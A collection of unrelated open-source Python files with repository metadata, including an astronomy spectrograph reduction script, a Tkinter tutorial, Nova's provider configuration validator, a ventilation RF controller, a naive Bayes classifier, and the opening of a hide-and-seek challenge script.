8ba794154ff3cd3d9c743c37de354fb71cfb5b12
|
/pyhydra/example_geha.py
|
5edad6290f86afb5200092f3e7eec4e8fa79820d
|
[] |
no_license
|
npadmana/py_hydra
|
76bbcc1024aefa3d6adac1ee6e615c761f080879
|
6f4c29a3b35de16a980f4ad390db3e1245f86d41
|
refs/heads/master
| 2020-12-24T13:53:01.539515
| 2011-10-22T03:01:14
| 2011-10-22T03:01:14
| 2,464,609
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,815
|
py
|
import pyhydra
from ROOTpy import *
datadir='../rawdata/jul2010/'
cc = pyhydra.HydraRun('test', imfix=pyhydra.utils.transpImage)
# Read in biases
dt = dtype([('x', 'S21'), ('y', 'f8')])
flist1 = loadtxt(datadir+'bias.plan', dtype=dt)
flist = [datadir + ff for ff in flist1['x']]
cc.set_bias(flist)
# Read in 2d flats
dt = dtype([('x', 'S21'), ('y', 'f8')])
flist1 = loadtxt(datadir+'flats.plan', dtype=dt)
flist = [datadir + ff for ff in flist1['x']]
cc.set_flat2d(flist)
# Generate traces
# The defaults have been tuned for this
cc.generate_traces()
# Trace out the flats
cc.trace_flat1d()
# Load in the arc solutions
flist1 = loadtxt(datadir+'allarc.plan', dtype=dt)
ww = flist1['y'] == 20.0
flist = [datadir + ff['x'] for ff in flist1[ww]]
cc.set_masterarc(flist, mintrace=20, maxtrace=60)
cc.find_masterarc_lines(lo=-20.0)
plt.clf()
cc.plot_masterarc_lines(rcut=None)
plt.savefig('geha_masterarc_all_lines.png')
plt.clf()
cc.plot_masterarc_lines(rcut=-100.0)
plt.savefig('geha_masterarc_rcut100_lines.png')
# Now generate the wavelength solution
arclines = pyhydra.arclines('CuAr', minwave=3000.0, maxwave=9000.0)
startwave = 7500.0 # What is your starting wavelength, guess here
disp = -1.5 # What is your starting dispersion in Ang/pixel, guess here
guess_quality = 0.8 # How good is your guess -- the worse this number is, the longer this will take
rcut = -100.0 # Set some line quality
sigrej= 5.0 # Throw out lines who are sigrej*MAD from zero. This is necessary for robustness
cc.get_wavesol(arclines, rcut, startwave, disp, guess_quality=guess_quality, sigrej=sigrej, niter=[20,10,5])
# Plot it
plt.clf()
cc.plot_wavesol(resid=False)
plt.savefig('geha_wavesol.png')
plt.clf()
cc.plot_wavesol(resid=True)
plt.savefig('geha_wavesol_resid.png')
cc.save('test1')
vv = cc.plot_traces()
|
[
"nikhil.padmanabhan@yale.edu"
] |
nikhil.padmanabhan@yale.edu
|
a473db825c8f4b512a6a16381a8d9197e23babf5
|
ed389764d8bea84b897c964d8ea25e025fe03d1b
|
/cat_age_whit_setter_getter.py
|
b4f830f3cb0529e803c65162d26f653b10e3b940
|
[] |
no_license
|
hyunsoo5656/lecture_4
|
982b1428f0960652a2f8d199dbf4d866200efbd4
|
fc266d1eaf16ee8ebd1924bfe8e1e1bf8aa4c28f
|
refs/heads/master
| 2022-11-16T05:41:31.875745
| 2020-07-17T01:38:05
| 2020-07-17T01:38:05
| 280,104,891
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 405
|
py
|
class Cat:
def __init__(self, name, age):
self.__name = name
self.__age = age
def __str__(self):
return 'Cat(name='+self.__name+', age='+str(self.__age)+')'
def set_age(self, age):
if age > 0:
self.__age = age
def get_age(self):
return self.__age
nabi = Cat('나비', 3)
print(nabi)
nabi.set_age(4)
nabi.set_age(-5)
print(nabi)
|
[
"hyunsoo5656@gmail.com"
] |
hyunsoo5656@gmail.com
|
a6106c574914e391aa1fd34dc75b81e990069d4f
|
f6fb09607e3351e8a8a808cc6edccb3cbef6a5f2
|
/script/server.py
|
e9036f737c3e79ef1cffb49b9a9022cfb90a360f
|
[
"Apache-2.0"
] |
permissive
|
matseng/googleads-ima-html5
|
b91a32d72b822c55fabfe81815d3d2fc1a42c1af
|
a9c7547b5db0d29026b294b6ff62c920da4812f5
|
refs/heads/master
| 2020-12-03T08:00:16.021545
| 2014-10-15T23:29:41
| 2014-10-15T23:29:41
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 736
|
py
|
#!/usr/bin/env python
import SimpleHTTPServer
class MyHTTPRequestHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
def end_headers(self):
self.send_my_headers()
SimpleHTTPServer.SimpleHTTPRequestHandler.end_headers(self)
def send_my_headers(self):
# self.send_header("Access-Control-Allow-Origin", "*")
self('Access-Control-Allow-Origin', 'http://imasdk.googleapis.com');
# self('Access-Control-Allow-Credentials', 'false');
self.send_header("Cache-Control", "no-cache, no-store, must-revalidate")
self.send_header("Pragma", "no-cache")
self.send_header("Expires", "0")
if __name__ == '__main__':
SimpleHTTPServer.test(HandlerClass=MyHTTPRequestHandler)
|
[
"mtseng@vindicogroup.com"
] |
mtseng@vindicogroup.com
|
38dce5d0f37915cb797c47057437081038b569ef
|
4a97fa694f2e39644b930d9bd0fe03736e1b983d
|
/Button.py
|
e95e668d08d0a5a7075ddaf1e8eba757c65706ed
|
[] |
no_license
|
MehrdadJannesar/Tkinter
|
c6b2328f260542a5da9c197cfe61d588c91b34ec
|
08ecd97b77c23c25fa8a22fd94df122a3812e3f1
|
refs/heads/master
| 2022-11-28T20:39:58.417258
| 2020-07-23T10:56:08
| 2020-07-23T10:56:08
| 281,925,467
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,169
|
py
|
# Button(master , option = value , ....)
# master --> This represents the parent window
# Option and Description
# activebackground --> Background color when the button is under the cursor
# activefoureground --> Foreground color when the button is under the cursor
# bg --> Normal background color
# bd --> Border width in pixels. Default == 2
# fg --> Normal Foreground (Text) color
# command --> Function or method to be called when the button is click
# font --> Text font to be used for the button's label
# height --> Height of the Button
# width --> Width of the button
# image --> image to be displayed on the Button
# justify --> Left or Right or Center --> How to show multiple text lines
# padx --> additionla padding left and right of the text
# pady --> additionla padding above and below of the text
# relief --> SUNKNE, RAISED, GROOVE, RIDGE
# state --> DISABLED, NORMAL, ACTIVE
from tkinter import *
from tkinter import messagebox
top = Tk()
top.geometry("100x100")
def helloCallBack():
msg = messagebox.showinfo("info", "Hello tkinter!")
b = Button(top, text = "Test", command = helloCallBack, state = "disable")
b.pack()
top.mainloop()
|
[
"jannesar.computer@yahoo.com"
] |
jannesar.computer@yahoo.com
|
5103174fd247efef0e902eccf04cb6c5e6dfb91d
|
6ff7ab13f7f4b0d699fa178a7d742c0253a6eddd
|
/nova/compute/provider_config.py
|
7860deb5e1c599576b2d5414b1386443feda9dc5
|
[
"Apache-2.0"
] |
permissive
|
keonjeo/nova
|
85402845d84c2c9c97e3514cd7d41fcccaca8ca6
|
197dac3c78a458302ccbda00b992879b2b2ffef1
|
refs/heads/master
| 2022-12-06T14:01:46.751686
| 2020-08-26T21:03:44
| 2020-08-26T21:03:44
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 18,342
|
py
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import glob
import jsonschema
import logging
import microversion_parse
import os
import yaml
import os_resource_classes
import os_traits
from nova import exception as nova_exc
from nova.i18n import _
LOG = logging.getLogger(__name__)
# A dictionary with keys for all supported major versions with lists of
# corresponding minor versions as values.
SUPPORTED_SCHEMA_VERSIONS = {
1: {0}
}
# Supported provider config file schema
SCHEMA_V1 = {
# This defintion uses JSON Schema Draft 7.
# https://json-schema.org/draft-07/json-schema-release-notes.html
'type': 'object',
'properties': {
# This property is used to track where the provider.yaml file
# originated. It is reserved for internal use and should never be
# set in a provider.yaml file supplied by an end user.
'__source_file': {'not': {}},
'meta': {
'type': 'object',
'properties': {
# Version ($Major, $minor) of the schema must successfully
# parse documents conforming to ($Major, 0..N).
# Any breaking schema change (e.g. removing fields, adding
# new required fields, imposing a stricter pattern on a value,
# etc.) must bump $Major.
'schema_version': {
'type': 'string',
'pattern': '^1.([0-9]|[1-9][0-9]+)$'
}
},
'required': ['schema_version'],
'additionalProperties': True
},
'providers': {
'type': 'array',
'items': {
'type': 'object',
'properties': {
'identification': {
'$ref': '#/$defs/providerIdentification'
},
'inventories': {
'$ref': '#/$defs/providerInventories'
},
'traits': {
'$ref': '#/$defs/providerTraits'
}
},
'required': ['identification'],
'additionalProperties': True
}
}
},
'required': ['meta'],
'additionalProperties': True,
'$defs': {
'providerIdentification': {
# Identify a single provider to configure.
# Exactly one identification method should be used. Currently
# `uuid` or `name` are supported, but future versions may
# support others. The uuid can be set to the sentinel value
# `$COMPUTE_NODE` which will cause the consuming compute service to
# apply the configuration to all compute node root providers
# it manages that are not otherwise specified using a uuid or name.
'type': 'object',
'properties': {
'uuid': {
'oneOf': [
{
# TODO(sean-k-mooney): replace this with type uuid
# when we can depend on a version of the jsonschema
# lib that implements draft 8 or later of the
# jsonschema spec.
'type': 'string',
'pattern':
'^[0-9A-Fa-f]{8}-[0-9A-Fa-f]{4}-'
'[0-9A-Fa-f]{4}-[0-9A-Fa-f]{4}-'
'[0-9A-Fa-f]{12}$'
},
{
'type': 'string',
'const': '$COMPUTE_NODE'
}
]
},
'name': {
'type': 'string',
'minLength': 1,
'maxLength': 200
}
},
# This introduces the possibility of an unsupported key name being
# used to get by schema validation, but is necessary to support
# forward compatibility with new identification methods.
# This should be checked after schema validation.
'minProperties': 1,
'maxProperties': 1,
'additionalProperties': False
},
'providerInventories': {
# Allows the admin to specify various adjectives to create and
# manage providers' inventories. This list of adjectives can be
# extended in the future as the schema evolves to meet new use
# cases. As of v1.0, only one adjective, `additional`, is
# supported.
'type': 'object',
'properties': {
'additional': {
'type': 'array',
'items': {
'patternProperties': {
# Allows any key name matching the resource class
# pattern, check to prevent conflicts with virt
# driver owned resouces classes will be done after
# schema validation.
'^[A-Z0-9_]{1,255}$': {
'type': 'object',
'properties': {
# Any optional properties not populated
# will be given a default value by
# placement. If overriding a pre-existing
# provider values will not be preserved
# from the existing inventory.
'total': {
'type': 'integer'
},
'reserved': {
'type': 'integer'
},
'min_unit': {
'type': 'integer'
},
'max_unit': {
'type': 'integer'
},
'step_size': {
'type': 'integer'
},
'allocation_ratio': {
'type': 'number'
}
},
'required': ['total'],
# The defined properties reflect the current
# placement data model. While defining those
# in the schema and not allowing additional
# properties means we will need to bump the
# schema version if they change, that is likely
# to be part of a large change that may have
# other impacts anyway. The benefit of stricter
# validation of property names outweighs the
# (small) chance of having to bump the schema
# version as described above.
'additionalProperties': False
}
},
# This ensures only keys matching the pattern
# above are allowed.
'additionalProperties': False
}
}
},
'additionalProperties': True
},
'providerTraits': {
# Allows the admin to specify various adjectives to create and
# manage providers' traits. This list of adjectives can be extended
# in the future as the schema evolves to meet new use cases.
# As of v1.0, only one adjective, `additional`, is supported.
'type': 'object',
'properties': {
'additional': {
'type': 'array',
'items': {
# Allows any value matching the trait pattern here,
# additional validation will be done after schema
# validation.
'type': 'string',
'pattern': '^[A-Z0-9_]{1,255}$'
}
}
},
'additionalProperties': True
}
}
}
def _load_yaml_file(path):
"""Loads and parses a provider.yaml config file into a dict.
:param path: Path to the yaml file to load.
:return: Dict representing the yaml file requested.
:raise: ProviderConfigException if the path provided cannot be read
or the file is not valid yaml.
"""
try:
with open(path) as open_file:
try:
return yaml.safe_load(open_file)
except yaml.YAMLError as ex:
message = _("Unable to load yaml file: %s ") % ex
if hasattr(ex, 'problem_mark'):
pos = ex.problem_mark
message += _("File: %s ") % open_file.name
message += _("Error position: (%s:%s)") % (
pos.line + 1, pos.column + 1)
raise nova_exc.ProviderConfigException(error=message)
except OSError:
message = _("Unable to read yaml config file: %s") % path
raise nova_exc.ProviderConfigException(error=message)
def _validate_provider_config(config, provider_config_path):
"""Accepts a schema-verified provider config in the form of a dict and
performs additional checks for format and required keys.
:param config: Dict containing a provider config file
:param provider_config_path: Path to the provider config, used for logging
:return: List of valid providers
:raise nova.exception.ProviderConfigException: If provider id is missing,
or a resource class or trait name is invalid.
"""
def _validate_traits(provider):
# Check that traits are custom
additional_traits = set(provider.get("traits", {}).get(
"additional", []))
trait_conflicts = [trait for trait in additional_traits
if not os_traits.is_custom(trait)]
if trait_conflicts:
# sort for more predictable message for testing
message = _(
"Invalid traits, only custom traits are allowed: %s"
) % sorted(trait_conflicts)
raise nova_exc.ProviderConfigException(error=message)
return additional_traits
def _validate_rc(provider):
# Check that resource classes are custom
additional_inventories = provider.get("inventories", {}).get(
"additional", [])
all_inventory_conflicts = []
for inventory in additional_inventories:
inventory_conflicts = [rc for rc in inventory
if not os_resource_classes.is_custom(rc)]
if inventory_conflicts:
all_inventory_conflicts += inventory_conflicts
if all_inventory_conflicts:
# sort for more predictable message for testing
message = _(
"Invalid resource class, only custom resource classes "
"are allowed: %s") % ', '.join(sorted(all_inventory_conflicts))
raise nova_exc.ProviderConfigException(error=message)
return additional_inventories
# store valid providers
valid_providers = []
for provider in config.get("providers", []):
# Check that the identification method is known since
# the schema only requires that some property be present
pid = provider["identification"]
provider_id = pid.get("name") or pid.get("uuid")
# Not checking the validity of provider_id since
# the schema has already ensured that.
additional_traits = _validate_traits(provider)
additional_inventories = _validate_rc(provider)
# filter out no-op providers so they will not be returned
if not additional_traits and not additional_inventories:
message = (
"Provider %(provider_id)s defined in %(provider_config_path)s "
"has no additional inventories or traits and will be ignored."
) % {
"provider_id": provider_id,
"provider_config_path": provider_config_path
}
LOG.warning(message)
else:
valid_providers.append(provider)
return valid_providers
def _parse_provider_yaml(path):
"""Loads schema, parses a provider.yaml file and validates the content.
:param path: File system path to the file to parse.
:return: dict representing the contents of the file.
:raise ProviderConfigException: If the specified file does
not validate against the schema, the schema version is not supported,
or if unable to read configuration or schema files.
"""
yaml_file = _load_yaml_file(path)
try:
schema_version = microversion_parse.parse_version_string(
yaml_file['meta']['schema_version'])
except (KeyError, TypeError):
message = _("Unable to detect schema version: %s") % yaml_file
raise nova_exc.ProviderConfigException(error=message)
if schema_version.major not in SUPPORTED_SCHEMA_VERSIONS:
message = _(
"Unsupported schema major version: %d") % schema_version.major
raise nova_exc.ProviderConfigException(error=message)
if schema_version.minor not in \
SUPPORTED_SCHEMA_VERSIONS[schema_version.major]:
# TODO(sean-k-mooney): We should try to provide a better
# message that identifies which fields may be ignored
# and the max minor version supported by this version of nova.
message = (
"Provider config file [%(path)s] is at schema version "
"%(schema_version)s. Nova supports the major version, "
"but not the minor. Some fields may be ignored."
% {"path": path, "schema_version": schema_version})
LOG.warning(message)
try:
jsonschema.validate(yaml_file, SCHEMA_V1)
except jsonschema.exceptions.ValidationError as e:
message = _(
"The provider config file %(path)s did not pass validation "
"for schema version %(schema_version)s: %(reason)s") % {
"path": path, "schema_version": schema_version, "reason": e}
raise nova_exc.ProviderConfigException(error=message)
return yaml_file
def get_provider_configs(provider_config_dir):
"""Gathers files in the provided path and calls the parser for each file
and merges them into a list while checking for a number of possible
conflicts.
:param provider_config_dir: Path to a directory containing provider config
files to be loaded.
:raise nova.exception.ProviderConfigException: If unable to read provider
config directory or if one of a number of validation checks fail:
- Unknown, unsupported, or missing schema major version.
- Unknown, unsupported, or missing resource provider identification.
- A specific resource provider is identified twice with the same
method. If the same provider identified by *different* methods,
such conflict will be detected in a later stage.
- A resource class or trait name is invalid or not custom.
- A general schema validation error occurs (required fields,
types, etc).
:return: A dict of dicts keyed by uuid_or_name with the parsed and
validated contents of all files in the provided dir. Each value in the dict
will include the source file name the value of the __source_file key.
"""
provider_configs = {}
provider_config_paths = glob.glob(
os.path.join(provider_config_dir, "*.yaml"))
provider_config_paths.sort()
if not provider_config_paths:
message = (
"No provider configs found in %s. If files are present, "
"ensure the Nova process has access."
)
LOG.info(message, provider_config_dir)
# return an empty dict as no provider configs found
return provider_configs
for provider_config_path in provider_config_paths:
provider_config = _parse_provider_yaml(provider_config_path)
for provider in _validate_provider_config(
provider_config, provider_config_path,
):
provider['__source_file'] = os.path.basename(provider_config_path)
pid = provider["identification"]
uuid_or_name = pid.get("uuid") or pid.get("name")
# raise exception if this provider was already processed
if uuid_or_name in provider_configs:
raise nova_exc.ProviderConfigException(
error=_(
"Provider %(provider_id)s has multiple definitions "
"in source file(s): %(source_files)s."
) % {
"provider_id": uuid_or_name,
# sorted set for deduplication and consistent order
"source_files": sorted({
provider_configs[uuid_or_name]["__source_file"],
provider_config_path
})
}
)
provider_configs[uuid_or_name] = provider
return provider_configs
|
[
"tao.su@intel.com"
] |
tao.su@intel.com
|
19d241f9c34e3cf73458f8cc54ad837d658b6827
|
0330a4bc717c9c422511c9a13e4a9e9090fdcf36
|
/service/Ideo/Ideo.py
|
2a3da2cd644f20bf23277b88d0897cfb0d4aa3ba
|
[] |
no_license
|
gstrub/rf2mqtt
|
cf99f4f4a72231f94f97d53a5ddb2039663493a7
|
c967b1ac581037c69165d4a29ac19eb9917d3d13
|
refs/heads/main
| 2023-02-16T05:36:20.491451
| 2021-01-13T13:51:37
| 2021-01-13T13:51:37
| 329,276,716
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,673
|
py
|
from enum import Enum
class AirflowState(Enum):
Low = 1
High = 0
Away = 2
class BypassState(Enum):
Off = 0
On = 8
Forced = 9
class Schedule(Enum):
Auto1 = 2
Auto2 = 3
Manual = 4
class Ideo:
def __init__(self, out):
self.__out = out
self._lowSpeed = 90
self._deviceId = 0
self._listeners = []
def _send(self, command, params):
output = "{0},{1:02X},{2:08X}".format(self._deviceId, command, params)
self.__out.write(output)
# Bouton boost cuisine (vitesse max pendant 30 minutes)
def boost(self):
self._send(0x94,0)
def setAwayMode(self, mode):
if mode:
self._send(0x41,1 << 16)
else:
self._send(0x41,0)
def setDateTime(self, dayOfWeek, hours, minutes):
self._send(0x3A, dayOfWeek + (hours << 8) + (minutes << 16))
def setMinAirflow(self, airflow):
self._send(0x3c, airflow << 16)
def setMaxAirflow(self, airflow):
self._send(0x3d, airflow << 16)
def setSchedule(self, mode):
self._send(0x3B, mode.value)
def setDirtyFilterRpmThreshold(self, rpm):
self._send(0x59, rpm << 16)
def requestInsideTemp(self):
self._send(0x31,0)
def requestOutsideTemp(self):
self._send(0x32,0)
def requestStatus(self):
self._send(0x33,0)
def register(self, listener):
self._listeners.append(listener)
def parseIncomingMessage(self, message):
message = message.strip(" \r\n")
tokens = message.split(",")
if (len(tokens) < 3): return
command = int(tokens[1], 16)
params = int(tokens[2], 16)
if (params==0): return
# Inside inlet (inside dirty air) temperature topic
if command == 0x31:
inlet_temp = (params >> 16) / 10.0
outlet_temp = (params & 0xFFFF) / 10.0
for r in self._listeners:
r.onInsideTemperatureUpdate(inlet_temp, outlet_temp)
# Outside inlet (fresh air) temperature topic
if command == 0x32:
inlet_temp = (params >> 16) / 10.0
outlet_temp = (params & 0xFFFF) / 10.0
for r in self._listeners:
r.onOutsideTemperatureUpdate(inlet_temp, outlet_temp)
# Status topic
if command == 0x33:
airflow = AirflowState ((params >> 16) & 0xf)
bypass = BypassState ((params >> 12) & 0xf)
for r in self._listeners:
r.onStatusUpdate(airflow, bypass)
|
[
"noreply@github.com"
] |
gstrub.noreply@github.com
|
dedf8c704bb8ecf6e6a002c52db956755b3875a1
|
15fcbb82c3fd15d9bb5bced735120d02d34e3521
|
/openwsn-sw/software/openvisualizer/openvisualizer/openType/typeAsn.py
|
7bec83e6230345541c68462414ea327ff2757c56
|
[] |
no_license
|
jobishjohn/comi-client-openwsn
|
bae75699532d4dee56d01a35eda4a36754ebe372
|
2c6de5013cb0e24e22db2d2c2689430c25972f55
|
refs/heads/master
| 2023-05-30T12:10:08.254275
| 2021-06-07T08:42:27
| 2021-06-07T08:42:27
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,098
|
py
|
# Copyright (c) 2010-2013, Regents of the University of California.
# All rights reserved.
#
# Released under the BSD 3-Clause license as published at the link below.
# https://openwsn.atlassian.net/wiki/display/OW/License
import logging
log = logging.getLogger('typeAsn')
log.setLevel(logging.ERROR)
log.addHandler(logging.NullHandler())
import openType
class typeAsn(openType.openType):
def __init__(self):
# log
log.info("creating object")
# initialize parent class
openType.openType.__init__(self)
def __str__(self):
return '0x{0}'.format(''.join(["%.2x"%b for b in self.asn]))
#======================== public ==========================================
def update(self,byte0_1,byte2_3,byte4):
self.asn = [
byte4,
byte2_3>>8,
byte2_3%256,
byte0_1>>8,
byte0_1%256,
]
#======================== private =========================================
|
[
"akaraaa@github.ugent.be"
] |
akaraaa@github.ugent.be
|
b003c95621e0c9b5b64bc1d6f057801ceb71d523
|
80fa04aa56a57abf1a690c5d57a0465073aa7552
|
/CodeWars/5-EnoughSpace.py
|
aacfedef370f1d3864299b15fc55a7be340d51fb
|
[] |
no_license
|
ViktoriiaSpiridonova/PythonCore
|
d395ff60aef8d3706edc6cf490ee77955e6d2b39
|
107c5a8b2660caab247eb00e909af4253855fc06
|
refs/heads/master
| 2020-04-16T05:22:51.625173
| 2019-02-21T19:22:05
| 2019-02-21T19:22:05
| 165,298,453
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 129
|
py
|
def enough(cap, on, wait):
if on + wait == cap or on + wait < cap:
return 0
else:
return on + wait - cap
|
[
"noreply@github.com"
] |
ViktoriiaSpiridonova.noreply@github.com
|
29e68f9ed314c878361224e5b2b97843d3d8ff32
|
301cf02790551c19b410e18560c9d6bf1d58e878
|
/setup.py
|
e47178794917dce123bdd0ef55ed9bfc1b5a63d6
|
[] |
no_license
|
luciodj/solitaire
|
4780b9c01a63f0a7c4da5df1dbcb4cc39d303ab8
|
15ab3fbdc1ae76a219a64fe9133c97b854dea12f
|
refs/heads/master
| 2021-01-10T07:41:03.218909
| 2019-02-10T14:30:28
| 2019-02-10T14:30:28
| 45,679,248
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 514
|
py
|
"""
Script for building SolitaireDJ.
Usage:
python setup.py py2app
"""
from setuptools import setup
NAME = 'SolitaireDJ'
VERSION = '0.1'
plist = dict(
CFBundleIconFile=NAME,
CFBundleName=NAME,
CFBundleShortVersionString=VERSION,
CFBundleGetInfoString=' '.join([NAME, VERSION]),
CFBundleExecutable=NAME,
CFBundleIdentifier='org.pygame.solitairedj',
)
setup(
data_files=['data'],
app=[
dict(script="Solitaire.py", plist=plist),
],
setup_requires=["py2app"],
)
|
[
"pilot@flyingpic24.com"
] |
pilot@flyingpic24.com
|
a034067a02cee32763a5f0c9746c1136dd9fc6c7
|
9dfd53873f7cf1a262089b3db2519cb4ae81caed
|
/scripts/NaiveBayesClassifier.py
|
cb43b697e60eaad35e91417a4355fb1e5e7b5e3f
|
[
"MIT"
] |
permissive
|
debjyoti385/intelliad
|
026194ff4386cbc9df7ea656c0b3b7609ffcef43
|
736bfd25557f3eb442f3500fb4bfab5d17183d6c
|
refs/heads/master
| 2020-04-22T17:30:09.233725
| 2016-02-07T02:38:21
| 2016-02-07T02:38:21
| 25,104,412
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,383
|
py
|
import nltk
from nltk.corpus import stopwords
import operator
from math import exp
############CONFIG#############
stops = set(stopwords.words('english'))
hashModuloPrime = 31
################################
#############UTILITY FUNCTIONS#########
def isStopWord(word):
return (word.lower() in stops)
def getHashValue(word):
return hash(word.lower()) % hashModuloPrime
# ignoring stopwords, calculate hash modulo prime and increase bucket counter to get
# constant size feature vector, like a histogram
def getHashTrickHistogramFeatureIgnoringStopWords(text):
feature=[0]*hashModuloPrime
for word in text.split():
if not isStopWord(word):
feature[getHashValue(word)]+=1
return feature
# ignoring stopwords, calculate word frequency map of text
def getWordFrequencyFeatureIgnoringStopWords(text):
freqFeat={}
for word in text.split():
wordLow=word.lower()
if not isStopWord(wordLow):
if wordLow not in freqFeat:
freqFeat[wordLow]=0
freqFeat[wordLow]+=1
return freqFeat
def mean(V):
return sum(V)*1.0/len(V)
def stdev(V):
m=mean(V)
s=0
for i in range(len(V)):
s+=((V[i]-m)**2)
return (s/len(V))**0.5
#############MODEL#####################
class NaiveBayesModel:
def __init__(self,categorySet):
self.categorySet=categorySet
self.prior={}
self.trainingPoints=0
self.trainingData=[]
self.classFeatureMean = {}
self.classFeatureStd = {}
self.classFeatureValues = {}
def trainSingle(self,text,labelSet):
self.trainingPoints+=1
# update apriori probability
for label in labelSet:
if label not in self.prior:
self.prior[label]=1.0
else:
self.prior[label]+=1.0
# train model
feature=getHashTrickHistogramFeatureIgnoringStopWords(text)
self.trainingData.append((feature,labelSet))
# call after training all the model
def evaluateModelParameters(self):
FeatLen=len(self.trainingData[0][0])
TrainingSize=len(self.trainingData)
#print 'TrainingSize:',TrainingSize
#print self.trainingData[0][1]
for trainingPoint in self.trainingData:
#print "trainingPoint=",trainingPoint
feature=trainingPoint[0]
labelSet=trainingPoint[1]
for label in labelSet:
if label not in self.classFeatureValues:
self.classFeatureValues[label]=[]
self.classFeatureValues[label].append(feature)
#for label in self.classFeatureValues:
#print 'Label:',label,',Values:',self.classFeatureValues[label]
for label in self.classFeatureValues:
for featureId in range(FeatLen):
S=[]
for trainingIndex in range(len(self.classFeatureValues[label])):
S.append(self.classFeatureValues[label][trainingIndex][featureId])
#print label,S
M = mean(S)
STD = stdev(S)
if label not in self.classFeatureMean:
self.classFeatureMean[label]=[]
if label not in self.classFeatureStd:
self.classFeatureStd[label]=[]
self.classFeatureMean[label].append(M)
self.classFeatureStd[label].append(STD)
#print 'Label:',label,',Mean & STD:'
#print self.classFeatureMean[label]
#print self.classFeatureStd[label]
def getAprioriProb(self,label):
if label not in self.prior:
return 0
#print label,'Apriori=',self.prior[label]/self.trainingPoints
return self.prior[label]/self.trainingPoints
def getLikelihood(self,label,attrValue,index):
m=self.classFeatureMean[label][index]
s=self.classFeatureStd[label][index]
'''if s==0.0:
return 1
power = -(attrValue-m)**2/(2*(s**2))
factor = (1.0/(2*3.142*s**2))**0.5
return factor*exp(power)
'''
return exp(-(attrValue-m)**2)
def getLabelsWithScores(self,text):
feature=getHashTrickHistogramFeatureIgnoringStopWords(text)
#print 'Test feature:',feature
finalprob={}
for category in self.categorySet:
likelihoodProduct=1
for i in range(len(feature)):
Pi_C = self.getLikelihood(category,feature[i],i)
likelihoodProduct*=Pi_C
finalprob[category]=likelihoodProduct*self.getAprioriProb(category)
return finalprob
def getBestLabel(self,text):
finalprob = self.getLabelsWithScores(text)
sorted_prob = sorted(finalprob.items(), key=operator.itemgetter(1),reverse=True)
return sorted_prob[0][0]
if __name__=='__main__':
nbm = NaiveBayesModel(set(['Business','Sports']))
nbm.trainSingle('i invest in football',set(['Business','Sports']))
nbm.trainSingle('i invest in XYZ',set(['Business']))
nbm.trainSingle('i love football',set(['Sports']))
nbm.evaluateModelParameters()
testText = 'i invest'
print 'Query:',testText
print 'Scores:',nbm.getLabelsWithScores(testText)
print 'Best class:',nbm.getBestLabel(testText)
|
[
"amit.bendale@batcave.local"
] |
amit.bendale@batcave.local
|
fc918b495238fde84c262720524de088c17cb4f9
|
c00ee80daf5b97904209823c74f5201db6739618
|
/main.py
|
01fd1a39c1d00b6ba1a73a0525bcb140b75b4140
|
[] |
no_license
|
nesl/hide-and-seek-challenge
|
db6c6487e53b8c1acd127579b1b01ed37cfce6dc
|
d57a8c32026f625eab0454cde5c156532a7fab93
|
refs/heads/master
| 2023-02-25T00:55:46.242582
| 2021-02-03T03:28:56
| 2021-02-03T03:28:56
| 333,614,839
| 0
| 1
| null | 2021-02-03T00:53:52
| 2021-01-28T01:52:13
|
Python
|
UTF-8
|
Python
| false
| false
| 14,534
|
py
|
"""
Script for competitors to locally test their solutions.
The script follows the logic of the competition's scoring process. The hider from `hider.py` and the seeker from
`seeker.py` will be imported and played against each other. Should be executed from containing directory.
See the command help:
```sh
$ python main.py --help
```
See also docstring of `main()` for more details.
Note:
The script requires the dependencies listed in `requirements.txt`. It can also be ran without tensorflow==1.15.2
or keras==2.3.1, but in that case, some parts of the script will be skipped.
Last updated Date: Oct 17th 2020
Code author: Evgeny Saveliev
Contact: e.s.saveliev@gmail.com
"""
import os
import argparse
import shutil
import numpy as np
from utils.misc import (
tf115_found,
tfdeterminism_found,
fix_all_random_seeds,
temp_seed_numpy,
in_progress,
tf_fixed_seed_seesion,
)
if tf115_found:
from utils.misc import tf_set_log_level
import logging
tf_set_log_level(logging.FATAL)
# # May be useful for determinism:
# import tensorflow as tf
# from keras import backend as K
# session_conf = tf.ConfigProto(intra_op_parallelism_threads=1, inter_op_parallelism_threads=1)
# sess = tf.Session(graph=tf.get_default_graph(), config=session_conf)
# K.set_session(sess)
if tfdeterminism_found:
from tfdeterminism import patch
patch()
else:
print("Warning: TensorFlow 1.15 was not found so the parts of the script that rely on it will be skipped.")
import utils.data_preprocess as prp
from utils.solutions import (
load_data,
load_generated_data,
parse_hider_output,
validate_hider_output,
validate_seeker_output,
benchmark_hider,
)
from utils.metric_utils import reidentify_score, feature_prediction, one_step_ahead_prediction
import hider as hider_module
import seeker as seeker_module
def main(args):
"""The main script - hider from `hider.py` and the seeker from `seeker.py` will be imported and played against
each other.
Stages of the script:
* Load data.
* Run the hider.
* Evaluate hider via feature prediction and one-step-ahead prediction.
* Run the seeker (on the hider's generated data).
Args:
args (argparse.Namespace): parsed arguments from the command line.
Raises:
ValueError: in case there are issues with required files or directories.
"""
# ================================================= System setup. ==================================================
# If no TensorFlow 1.15 found on the system, skip parts of the script.
if not tf115_found:
args.skip_fp = True
args.skip_osa = True
# Fix random seeds.
fix_all_random_seeds(args.seed)
# NOTE:
# The fix_all_random_seeds() call may not be sufficient to make tensorflow fully deterministic.
